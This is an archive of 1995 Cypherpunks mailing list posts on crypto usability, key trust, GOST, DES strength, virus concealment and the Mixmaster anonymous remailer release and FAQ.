   "one-way functions" and "public-key encryption." These
   are quite advanced concepts, so I'm only going to touch
   on them. Keep in mind that regardless of how complicated
   the system is technically, it will be extremely easy for
   you to use. You'll just tell your information appliance
   what you want it to do and it will seem to happen
   effortlessly.

(Thanks to the anonymous person who typed it in)

   We may not all like Bill Gates, and some of us even boycott his 
software, but we must admit he is a very shrewd businessman and knows 
which side of his toast is buttered. I think this paragraph is right on 
the mark. The competition for which cryptographic protocol wins will be 
decided on the basis of usability.

   The "dark forces" are no doubt aware of this fact, and have already
made some advances in this area. One example is the Fortezza card. 

   If cypherpunks are to have any hope of getting their vision of strong 
crypto implemented and deployed, it has to be in the context of usable 
systems.

   Form this perspective, let's take a look at the recent thread on
"establishing trust." Carl Ellison advocates the MOSS alias system. My
understanding of this system is that individual users associate "aliases" 
with public keys. If done right, it can work well. However, from a
usability perspective, it is just one more trouble spot. 
   First, on what basis will users decide which keys are worthy of being
assigned which aliases? Public keys are big hunks of base64 encoded
gibberish. They are difficult to present in a user interface, difficult 
to communicate in alternate, known secure channels (such as telephone 
calls and face to face communication). There is no way that a person 
could memorize one.
   The other issue is how much time and energy the user has to spend 
keeping the alias database up to date. There is no way to communicate 
securely with anyone who's not in the database. If the user is 
communicating with a large number of people, then it's very tempting to 
get sloppy.

   There's no way around it. This kind of system will not make it in the 
big time. As I see it, any system that does must have the following 
properties:

   * Some variant on the Web of Trust.

   * Online key-servers for getting keys in real time.

   * A clean mechanism for validating keys through alternate channels.

   There are three possible outcomes: we build it, the NSA builds it, or 
Microsoft/Netscape builds it. This last outcome might not be so bad, but 
only in the first one can we rely on our principles being advanced.

Raph





From stewarts at ix.netcom.com  Mon Nov 27 12:12:19 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 28 Nov 1995 04:12:19 +0800
Subject: GOST for sale
Message-ID: <199511271952.LAA26668@ix3.ix.netcom.com>


At 03:43 AM 11/24/95 +0100, Mats Bergstrom <asgaard at sos.sll.se> wrote:
>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe', 
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's 
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Alledgedly it uses 'GOST 28147-89',
>whatever that stands for.
>
>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

>From what I've read of GOST, it's really a family of cyphers with
different sets of S-boxes - routine military gets one set, top secret
gets another, civilian govt another, etc.  Aside from possible
differences in security level for the S-boxes, one motivation is
that you can't take civilian govt decryptors and use them to read
or forge top secret military crypto, etc.  If this is correct,
then some sets of S-boxes probably do have trapdoors (at least
susceptibility to differential cryptanalysis_; how good are the
ones that Jetico is selling, what credentials do they have to
convince us their cryptanalysis is good enough, and why are they
doing parts of it in hardware?
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From stewarts at ix.netcom.com  Mon Nov 27 12:14:42 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 28 Nov 1995 04:14:42 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511271952.LAA26633@ix3.ix.netcom.com>


At 11:20 AM 11/25/95 -0800, you wrote:
>At 01:53 AM 11/26/95 -0800, anonymous-remailer at shell.portal.com wrote:
>>You'd rather sign before encryption??
>>Doesn't that give you "known plain-text" to attack?
>
>The signature is not known unless the whole message being signed is
>known.

Signatures often have known, or easily guessed, plaintext in them,
like the signer's name or ID number, or various header fields
such as X.509's equivalent to ----- BEGIN PGP ....

>And any encryption scheme that is vulnerable to known plaintext attack
>where only a part of the message is known, is worthless anyway.

DES isn't worthless.  It's a bit weak, but not worthless.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From adam at lighthouse.homeport.org  Mon Nov 27 12:34:44 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Tue, 28 Nov 1995 04:34:44 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID: <199511272026.PAA11253@homeport.org>


Alex Strasheim wrote:

| The Chicago Sun-Times is running a contest in which readers are asked to
| send in their social security numbers.  Someone will win a cash prize
| after a random drawing. 

	Sounds like a prime time to misremember your social security
number.  Alternately, transpose digits, make 6's and
8's indistinguishable, etc.  Don't see it as oppression; see it as a
prime chance to monkeywrench another database.

Adam '119 36 3801'

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From dl at hplyot.obspm.fr  Mon Nov 27 12:39:16 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Tue, 28 Nov 1995 04:39:16 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <9511272025.AA16830@hplyot.obspm.fr>


Jeff Weinstein writes:
 > > Is anyone running an ssl web server that would let us see how this works?
 > 
 >   A little bird pointed me toward https://www.secret.org.  I have no
 > idea who they are...
For those that want to know what's there without wasting their time
'upgrading' to netscape 2.x,etc.... 
There is (currently?) very little, the only thing interesting I found
is that 'they' claim to give away free CA if you mail at
<ca at secret.org> (their 'Project7'/'666 Crypto' route...)

Regards

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Marxist SEAL Team 6 jihad break mururoa explosion smuggle





From zerucha at shell.portal.com  Mon Nov 27 13:04:59 1995
From: zerucha at shell.portal.com (Thomas E Zerucha)
Date: Tue, 28 Nov 1995 05:04:59 +0800
Subject: Virus attacks on PGP
In-Reply-To: <199511270737.XAA20199@netcom16.netcom.com>
Message-ID: <Pine.SUN.3.90.951127123642.15406A-100000@jobe.shell.portal.com>


On Sun, 26 Nov 1995, Bill Frantz wrote:

> At 11:40 11/26/95 -0800, Thomas E Zerucha wrote:
> >That woudl be interesting - even with the speaker "off" the power surge 
> >causes clicking and other signs.  Not to mention that the interrupt count 
> >would start moving (of course the virus could replace the entire OS and 
> >would only have to find 300K chunks to hide in).
> 
> I looked at the memory usage on my 1meg Mac and 5meg is used for the
> system.  I have no idea what it is all being used for.  A lot can hide
> there.
> 

But it would also have to hide in something you load at boot time.  For 
it to propogate there, it would have to make copies of itself. when crond 
and inetd and named all grow over 400K I get curious.  Dos has small 
usage, and Linux provides a link map (or I can checksum entry points or 
such).  Another fun thing to do is pkexe or gzexe.  The latter turns an 
exe into a shell script.  Patching compressed files is very difficult.

zerucha at shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha at jobe.portal.com for PGP key






From JonathanZ at consensus.com  Mon Nov 27 13:20:26 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Tue, 28 Nov 1995 05:20:26 +0800
Subject: The future will be easy to use
Message-ID: <v02120d08acdfd6f40be1@[157.22.240.13]>


At 11:06 AM 11/27/95, Raph Levien wrote:

.. stuff..

>The competition for which cryptographic protocol wins will be
>decided on the basis of usability.
.. stuff..
>   If cypherpunks are to have any hope of getting their vision of strong
>crypto implemented and deployed, it has to be in the context of usable
>systems.

.. stuff..

>   There's no way around it. This kind of system will not make it in the
>big time. As I see it, any system that does must have the following
>properties:
>
>   * Some variant on the Web of Trust.
>
>   * Online key-servers for getting keys in real time.
>
>   * A clean mechanism for validating keys through alternate channels.
>
>   There are three possible outcomes: we build it, the NSA builds it, or
>Microsoft/Netscape builds it. This last outcome might not be so bad, but
>only in the first one can we rely on our principles being advanced.

This is a very important period. The technology is young enough that a
window is open for a non-giant to produce a dominant product.

On the other hand, it takes actual coordination of resources. I'm not sure
that it is within the range of Cypherpunks to take advantage of this
window. There is still no agreement whether the group can be said to have a
single vision, nor whether people within it want to be bounded by another's
view.

If people really wish to take advantage of this and really push things, it
means forming a group, made up of Cypherpunk members perhaps, but much
smaller, and capable of working together. Also capable of handling not only
the theory, but good solid code, GUI, PR, meetings, talking to the
government, etc.

It is an open window yes, but not a simple one. I'd love to see widespread
use of secure encryption, however I don't think the potential exists within
the Cypherpunk framework to reach it as 'Cypherpunks'. The question then
is, whether Cypherpunks should change, or whether a smaller group will be
formed.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ at consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..







From mixmaster at obscura.com  Mon Nov 27 13:50:32 1995
From: mixmaster at obscura.com (Mixmaster)
Date: Tue, 28 Nov 1995 05:50:32 +0800
Subject: Announcement: mixmaster 2.0.3 released!
Message-ID: <199511272121.NAA00088@obscura.com>


Announcing the release of Mixmaster version 2.0.3
Among other improvements it includes an new and
improved Makefile. Installing Mixmaster is a SNAP!

For information about Mixmaster, and how to get it,
check out http://obscura.com/~loki or read the Mixmaster FAQ
which will be posted soon.

	-Lance





From raph at c2.org  Mon Nov 27 13:57:51 1995
From: raph at c2.org (Raph Levien)
Date: Tue, 28 Nov 1995 05:57:51 +0800
Subject: The future will be easy to use
In-Reply-To: <v02120d08acdfd6f40be1@[157.22.240.13]>
Message-ID: <Pine.SUN.3.91.951127130923.21091A-100000@infinity.c2.org>




On Mon, 27 Nov 1995, Jonathan Zamick wrote:

> This is a very important period. The technology is young enough that a
> window is open for a non-giant to produce a dominant product.

Full agreement.

> On the other hand, it takes actual coordination of resources. I'm not sure
> that it is within the range of Cypherpunks to take advantage of this
> window. There is still no agreement whether the group can be said to have a
> single vision, nor whether people within it want to be bounded by another's
> view.
> 
> If people really wish to take advantage of this and really push things, it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Right.

> It is an open window yes, but not a simple one. I'd love to see widespread
> use of secure encryption, however I don't think the potential exists within
> the Cypherpunk framework to reach it as 'Cypherpunks'. The question then
> is, whether Cypherpunks should change, or whether a smaller group will be
> formed.

I think that changing the focus of cypherpunks is intractable enough that 
forming a new group is the only feasible alternative. Right now, I don't 
have the time to try to form such a group, but I would be an enhusiastic 
participant if such a group was to be formed.

Incidentally, I've had one bad experience with this type of thing (it was
the PGP 3.0 development team), so I realize it's not easy. A couple of
things I've learned from the experience: 

* Clear goals.

* A leader, someone who would call the shots, and would also serve as the
person you'd have to convince.

* Open communications. Shrouding a project in secrecy is a good way to 
kill it. This is one potential advantage we have over the spooks.

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
Gutmann, and others have proved themselves quit capable of writing good
solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
Dan Bernstein, and some others (who I'm not sure want to be named) are
talking to the government. GUI I'm less sure about, but I'd hope that some
cpunks would come out of the woodwork.

It is not a matter of ability, but of will.

Raph






From JonathanZ at consensus.com  Mon Nov 27 14:02:34 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Tue, 28 Nov 1995 06:02:34 +0800
Subject: The future will be easy to use
Message-ID: <v02120d0aacdfe235b0b7@[157.22.240.13]>


>* Clear goals.
>
>* A leader, someone who would call the shots, and would also serve as the
>person you'd have to convince.
>
>* Open communications. Shrouding a project in secrecy is a good way to
>kill it. This is one potential advantage we have over the spooks.
>
>It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
>Gutmann, and others have proved themselves quit capable of writing good
>solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
>Dan Bernstein, and some others (who I'm not sure want to be named) are
>talking to the government. GUI I'm less sure about, but I'd hope that some
>cpunks would come out of the woodwork.
>
>It is not a matter of ability, but of will.

It is also a matter of funding of course. While development can be donated
time, the rest often takes money. Still, its something to look into.
Handling RSAREF is sapping much of my time, otherwise I'd jump right in,
however I like to always pause before committing my time to endeavors. I
wouldn't mind helping out though. Certainly Consensus probably has some
resources with its own contacts to contribute.

I agree with your points though. Another thing to consider, are some
alternate methods of enterprise design that involve better communication,
iteration of goals vs product, etc. (Actually I need to work on a speech
about this that is coming up soon. Yet another project. :)

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ at consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..







From perry at alpha.jpunix.com  Mon Nov 27 14:34:56 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Tue, 28 Nov 1995 06:34:56 +0800
Subject: New Mixmaster
Message-ID: <199511272220.QAA28147@alpha.jpunix.com>


-----BEGIN PGP SIGNED MESSAGE-----

Lance's new Mixmaster 2.0.3 is also available on vishnu.alias.net via
the normal methods.

 John Perry - KG5RG - perry at alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry at jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLo5iaghiWHnUu4JAQGTogf/XdW+U3MPg668h7oofd2IYkP4dQNv8m3r
TUTKnmUuQP6JqJV2Y2QC9oF2A6VobNC7Q1EP3s6xbMIP8a20hMsvvJbWYRDfIBWH
ydTBGMk8JZvDXHVlok5eVD99Krrl51pQskWjxBuZKJMTZSTL7TmJYxX+JHWFViAh
qPOVOImZfyKlInra36EHO1M7bptMjc0pwEQQ6tOrnPbBzlUYLm/xWtWXyvXjH7QJ
WxAiLHTS55Y3UMhTBoqMtOViWXOaW8nY14mzEnN2B2byoXMiSsDWGhpr0wWDJ5CC
oYWQWZPyHB0H6T5MWNT95/GO7wxfxj3+nx1MyPKcjg8efShwWEOVfg==
=d6hk
-----END PGP SIGNATURE-----





From jgrasty at pts.mot.com  Mon Nov 27 14:36:00 1995
From: jgrasty at pts.mot.com (Joey Grasty X3697 P6611)
Date: Tue, 28 Nov 1995 06:36:00 +0800
Subject: Judge won't drop Netcom from suit
Message-ID: <30BA3798.2781E494@pts.mot.com>


Check out the story on the Scientology suit. 

http://www.sjmercury.com/scie1127.htm





From zuhn at sctc.com  Mon Nov 27 14:39:36 1995
From: zuhn at sctc.com (david d `zoo' zuhn)
Date: Tue, 28 Nov 1995 06:39:36 +0800
Subject: The future will be easy to use
In-Reply-To: <v02120d0aacdfe235b0b7@[157.22.240.13]>
Message-ID: <199511272224.QAA20539@spirit.sctc.com>


I would posit that any "Cypherpunks" group arranged to "write the software
for privacy" would rapidly get bogged down in the sorts of problems that
Raph mentioned, as well as a host of others.  The inter-person politics of
the free software groups on the Internet are amazing (and something I like
to avoid these days).

On the technical side, what piece of software do we need for privacy? 
Well, anonymizing WWW re-servers.  Better interfaces to secure mail. 
Better interfaces to the anonymous remailers.  Remailer-as-delivery (e.g,
mailing a delivery ticket which the recipient would have to use in order
to get the message from the remailer).  IPsec.  Reputation & certification
systems.  Inter-site encryption.  The list goes on (and on).

And then what platform do you aim for?  

I see the value of the cypherpunks list as a meeting point for a wide
variety of folks, each of whom is likely to go off to do work in their own
area, with new perspective on the values of privacy.

The value of the list as a conjunction of pro-privacy folks is much
greater than it's value as a list where implementation of some application
can be coordinated.   If nothing else, the amount of work to be done is
greater than that doable even if every member of the list sat down to
write code full-time.
Not that we couldn't get amazing things done, but...

ObSpoilsporting over.  Go for it, and best of luck to you.

-- 
david d `zoo' zuhn   ---  secure computing corporation
zuhn at sctc.com 





From jps at monad.semcor.com  Mon Nov 27 15:14:00 1995
From: jps at monad.semcor.com (Jack P. Starrantino)
Date: Tue, 28 Nov 1995 07:14:00 +0800
Subject: The future will be easy to use
In-Reply-To: <v02120d08acdfd6f40be1@[157.22.240.13]>
Message-ID: <9511272256.AA13473@monad.semcor.com>


One more time for the security/cypher-impared (me at least).

I suspect there are a fair number of lurkers here who code for a living
and would be willing to contribute if someone/the_group can articulate
a requirements statement and then push it to the design stage.

I bring nothing cypher-wise. I would be willing to help walk the
s/w-engineering dog and to write Motif/X/socket if the chosen platform
is UN*X, however.

So, from an engineering standpoint, what should the "future" look
like?

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps at semcor.com
Suite C-100
Warminster, PA 18974





From Greg_Rose at sydney.sterling.com  Mon Nov 27 15:15:10 1995
From: Greg_Rose at sydney.sterling.com (Greg Rose)
Date: Tue, 28 Nov 1995 07:15:10 +0800
Subject: establishing trust
In-Reply-To: <199511270516.AAA05126@clark.net>
Message-ID: <pgpmoose.199511280943.49404@paganini.sydney.sterling.com>


Carl M. Ellison wrote:
  Did you intentionally not provide the same key that this was signed with?
  I added the key you provided, but PGP still couldn't find the right key for
  this signature.

I think we've discovered another potential nasty.
I accidentally sent out the SECRET key not the
public key. I believe the problem you suffered was
because it added it to secring not pubring.

No I'm not going to make the passphrase public. I
apologise for any inconvenience to people who
added this to their secring.pgp, it was certainly
not intentional on my part to do this to people.
You should probably delete it.

Greg.





From EALLENSMITH at ocelot.Rutgers.EDU  Mon Nov 27 17:24:48 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 28 Nov 1995 09:24:48 +0800
Subject: Cyberangels vs Anonymnity
Message-ID: <01HY5FBP59SG8WYPHF@mbcl.rutgers.edu>


	Here's the section from the Cyberangel FAQ which should explain why
I put the addresses on the list. Given that their main tactic so far is telling
ISPs, I would guess that any unauthorized remailers may be in trouble... once
they get a clue enough to spot them. Yes, the shouting is theirs.
	-Allen

  _9) WHAT KINDS OF CHANGES WOULD THE GUARDIAN ANGELS / CYBERANGELS LIKE TO
  SEE?_
  
  
  A) WE WOULD LIKE TO SEE AN IMPROVEMENT IN USER IDENTIFICATION. USER ID IS
  IMPOSSIBLE TO VERIFY OR TRACE BACK. THE VERY ANONYMITY OF USERS IS ITSELF
  CAUSING AN INCREASE IN RUDENESS, SEXUAL ABUSE, FLAMING, AND CRIMES LIKE
  PEDOPHILE ACTIVITY. WE THE NET USERS MUST TAKE RESPONSIBILITY FOR THE PROBLEM
  OURSELVES. ONE OF OUR DEMANDS IS FOR MORE ACCOUNTABLE USER IDS ON THE NET.
  WHEN PEOPLE ARE ANONYMOUS THEY ARE ALSO FREE TO BE CRIMINALS. IN A RIOT YOU
  SEE RIOTERS WEARING MASKS TO DISGUISE THEIR TRUE IDENTITY. THE SAME THING IS
  HAPPENING ONLINE. WE WOULD LIKE TO SEE USER ID MUCH MORE THOROUGHLY CHECKED
  BY INTERNET SERVICE PROVIDERS.
    ________________________________________________________________________
  
  CYBERANGELS � � � � EMAIL ADDRESS: ANGELS at WAVENET.COM





From ravage at einstein.ssz.com  Mon Nov 27 17:42:17 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Tue, 28 Nov 1995 09:42:17 +0800
Subject: Meeting: Austin, TX
Message-ID: <199511280130.TAA00326@einstein.ssz.com>



Hi all,

The Austin Cypherpunks will be meeting this Saturday from 6-8pm at Ted's
Greek Restaurant on Congress between 4th and 5th. We will be taking the
tables in the rear.

The main topic of discussion will be the proposed 1 hour public access video
on cryptography. Also we will be discussing making some form of monthly
key-signing.

Hope to see you there!






From perry at alpha.jpunix.com  Mon Nov 27 17:48:45 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Tue, 28 Nov 1995 09:48:45 +0800
Subject: The corrected Mixmaster
Message-ID: <199511280131.TAA02826@alpha.jpunix.com>


-----BEGIN PGP SIGNED MESSAGE-----

The corrected mixmaster 2.0.3 is also available on vishnu.alias.net
via the normal methods. I apologize for any inconvenience.

 John Perry - KG5RG - perry at alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry at jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLpmXlOTpEThrthvAQFpSQP/euSY5hvIvSwRMZuiOEx9j6IER5k2rDEc
6rfNEccIP95YtGcDJ70lLbuTq4sHjrKYe2vyz9OpMn48mQEVfjcs/JFSt4xfpU8s
hpK2a4HvWACBa/J9TKlgtEuXCrAkBoROkn6pVsV4hAqwDhM6oNuDaEk+93KVl/wn
dJ/5+gqSiYY=
=0EGC
-----END PGP SIGNATURE-----





From black at sunflash.eng.usf.edu  Mon Nov 27 17:54:55 1995
From: black at sunflash.eng.usf.edu (James Black)
Date: Tue, 28 Nov 1995 09:54:55 +0800
Subject: The future will be easy to use
In-Reply-To: <9511272256.AA13473@monad.semcor.com>
Message-ID: <Pine.SUN.3.91.951127203639.6314F-100000@sunflash.eng.usf.edu>


Hello,

On Mon, 27 Nov 1995, Jack P. Starrantino wrote:

> I suspect there are a fair number of lurkers here who code for a living
> and would be willing to contribute if someone/the_group can articulate
> a requirements statement and then push it to the design stage.

  As soon as PGP 3.0 is released I am planning on incorporating PGP into 
Pine, and start putting it into more programs, to increase the usage of 
encryption things before they go out.
  I am planning on adding a chat ability to a browser, and hopefully that 
will be encrypted, as well.
  Take care and have fun. (from a lurker)

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black at eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************






From nobody at REPLAY.COM  Mon Nov 27 17:57:15 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 28 Nov 1995 09:57:15 +0800
Subject: Cray's New T3E
Message-ID: <199511280140.CAA25757@utopia.hacktic.nl>



WSJ, Nov 27, 1995

Cray Research to Unveil 2nd-Generation Parallel Processor
for Technical Market

By William M. Bulkley

Cray Research Inc., bidding to reassert its dominance of
high-end scientific supercomputing, is expected to unveil
tomorrow a new parallel-processing supercomputer with
unprecedented speed.

The Eagan, Minn., computer maker has been best-known for
its multimillion-dollar vector supercomputers that use
just a few very powerful processors. The new Cray T3E
will be its second-generation parallel processor. Unlike
its predecessor the T3D, it operates without being
connected to a traditional vector supercomputer.

People familiar with the machine say it will have a
theoretical top speed of more than one trillion
operations a second, or one teraflops, a measure of
supercomputer speed. Currently the only planned teraflops
machine is one that Intel Corp. is building for the
Energy Department's Sandia National Laboratories.

'Back in the Game'

"We look at this as evidence of Cray reasserting its
franchise in the technical computing market," said Debra
Goldfarb, who follows supercomputers for International
Data Corp., a market research firm in Framingham, Mass.
"Cray's back in the game."

The smallest models are likely to be priced at well under
$1 million. Buyers will be able to increase power by
adding just a few processors at a time in the future
making the systems "highly scalable" in industry
parlance. The T3E can be built with as few as 16
processors or as many as 2,048 processors.

"This reconfirms Cray's capabilities to build very
efficient high-performance computers," said Philip
Samper, chairman and chief executive officer, who was
hired last spring. Cray has said it will report a net
loss for the current year, reflecting restructuring
charges as Mr. Samper cuts costs, and sales are weak as
customers have been waiting for new generations of both
Cray's T90 vector supercomputers and the T3E. Mr. Samper
said that Cray will be profitable in the current fourth
quarter on an operating basis before an expected
restructuring charge, and "We expect to be profitable in
1996. That's very important for this company."

Mr. Samper, who declined to discuss details of the T3E,
said in an interview, "We have $100 million in orders
already in house. When customers get so excited they put
money on the line, that's the ultimate test." The T3E
won't be available for sale until the end of the first
quarter of 1996. Cray's total backlog was $355 million at
the end of the third quarter, including orders for the
T3E.

Cray, the longtime leader in scientific supercomputing,
faced challenges from a host of smaller companies in the
late 1980s as well as three big Japanese computer makers.
But with the end of the Cold War, military need for
supercomputers diminished, Cray's sales plateaued and
several of the smaller companies went out of business.

Offsetting Some Declines

Analysts estimate the high-performance-computer market at
about $3 billion a year, with growth in commercial
markets for large databases and video-servers for
interactive-media, offsetting declines in government
business. International Business Machines Corp. and
Silicon Graphics Inc. have both grown rapidly by selling
parallel-processing systems in those markets.

Cray sells small commercial supercomputers and commercial
servers for computer networks of Sun Microsystems Inc.
workstations. However, analysts say it needs revenue from
the high-performance scientific market to rebound. Jay P.
Stevens, an analyst with Dean Witter, says sales in the
current year will fall 27% to $615 million from $921.6
million. Next year he forecasts a 20% rise to $808
million. Mr. Stevens predicts a net loss before charges
for 1995 of $73 million, or $1.25 a share, compared with
net income of $55.7 million, or $2.32 a share, in 1994.

Mr. Samper said that during the year, Cray has reduced
research-and-development spending by 16% and lowered
overheads. He said it plans to buy more parts from
outside suppliers, and is also controlling costs by
negotiating with government agencies to have them pick up
certain research and support costs.

-----







From perry at piermont.com  Mon Nov 27 18:01:45 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 10:01:45 +0800
Subject: Cray's New T3E
In-Reply-To: <199511280140.CAA25757@utopia.hacktic.nl>
Message-ID: <199511280146.UAA11393@jekyll.piermont.com>



Couldn't you have just posted a pointer to this instead? Yes, we know
faster computers are being built. Its not cypto-relevant,
though. Sure, the NSA will buy some, but that is hardly news or
interesting.

Anonymous writes:
> WSJ, Nov 27, 1995
> 
> Cray Research to Unveil 2nd-Generation Parallel Processor
> for Technical Market
> 
> By William M. Bulkley





From perry at alpha.jpunix.com  Mon Nov 27 18:16:13 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Tue, 28 Nov 1995 10:16:13 +0800
Subject: key changes for secret.alias.net
Message-ID: <199511280159.TAA03326@alpha.jpunix.com>


-----BEGIN PGP SIGNED MESSAGE-----

Hello everyone,

	secret.alias.net suffered a key change when installing the new
Mixmaster code. Be sure to get the new key from vishnu.alias.net via
http://vishnu.alias.net/pubring.mix.html and type2.list.html. It's also
available by ftp from vishnu.alias.net.

 John Perry - KG5RG - perry at alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry at jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLps86ghiWHnUu4JAQGY/Af9F6L6wt5CCHyOEIBB41vx4Pg4qs8iUELH
L+iQRnSpbhRdh+WCWltsk4vvzBVJQKd0n6n8qb6Lt/5p2DTg5nNRKrkmBeAQ4Y5i
7L81IIE8cM+3dmHy3LzTSwhuBtO0P46NDjNHcZ1cViZt8x1Rjsz2/wfYNgh9jyV5
ENfBZ931Vhx+ne8oge83kbs/y0v2K1Kwk7Tr+cIQ/jMV1vPu9roxfARSSwULTTBa
VjqtqFkqDAu+XyOuL2yGuoBiusUjwuQMVROCODhQ9PqVw1S/cnvwz+SucGqtcL74
9zPj6f4aYDzRweT0jkASBlwfj8JBaGxS32HpoudVtU8y5/Nsus9eOg==
=Zx6V
-----END PGP SIGNATURE-----





From EALLENSMITH at ocelot.Rutgers.EDU  Mon Nov 27 18:28:55 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 28 Nov 1995 10:28:55 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <01HY5GZFNPQO8WYPHF@mbcl.rutgers.edu>


	I am curious on whether there are any applications of the directed
Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
reaosn for asking is that I've come across something in my field (molecular
genetics) that can be used to solve such problems in a couple of weeks or so.
	-Allen





From black at sunflash.eng.usf.edu  Mon Nov 27 18:54:32 1995
From: black at sunflash.eng.usf.edu (James Black)
Date: Tue, 28 Nov 1995 10:54:32 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511271952.LAA26633@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951127201852.6314C-100000@sunflash.eng.usf.edu>


Hello,

On Mon, 27 Nov 1995, Bill Stewart wrote:

> Signatures often have known, or easily guessed, plaintext in them,
> like the signer's name or ID number, or various header fields
> such as X.509's equivalent to ----- BEGIN PGP ....

  If the signature is padded with random junk on the end, then it makes 
it harder to do a known text attack.  There was a message a few days ago 
by Anderson and someone else (in England) that dealt with weaknesses in 
some encryption protocols.  It was good to read.

> DES isn't worthless.  It's a bit weak, but not worthless.

  Even though he didn't have proof Bruce Schneier stated in "Applied 
Cryptography 2nd Ed" that the NSA might have a machine that can crack DES 
in 15 mins, and maybe as low as 3-5, as one was built and sold.  The book 
can explain it more, as I am doing this from memory.
  Take care and have fun.
 
==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black at eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************






From mixmaster at obscura.com  Mon Nov 27 18:56:05 1995
From: mixmaster at obscura.com (Mixmaster)
Date: Tue, 28 Nov 1995 10:56:05 +0800
Subject: Mixmaster Remailer FAQ
Message-ID: <199511280121.RAA05114@obscura.com>


-----BEGIN PGP SIGNED MESSAGE-----

Frequently Asked Questions about Mixmaster Remailers
FAQ Verson 1.7 Nov 27 1995
by Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers.
I wrote this to answer questions often asked by new users of Mixmaster,
and to explain why you would want to use Mixmaster remailers.
At the end of this FAQ is a list of currently active Mixmaster remailers.


**Announcements**

I am pleased to announce the release of Mixmaster 2.0.3
It contains many bug fixes, and a much improved Makefile which
makes compiling a snap!


**What is Mixmaster?**

Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list.
Mixmaster is the next generation in the evolution of remailer technology.


**What is an anonymous remailer?**

Quoting from Andre Bacard's remailer FAQ:

  An anonymous remailer (also called an "anonymous server")
  is a free computer service that privatizes your e-mail.
  A remailer allows you to send electronic mail to a Usenet
  news group or to a person without the recipient knowing
  your name or your e-mail address.

For a non-technical introduction to remailers (not including Mixmaster),
I recommend Andre's FAQ. It is posted regularly to:
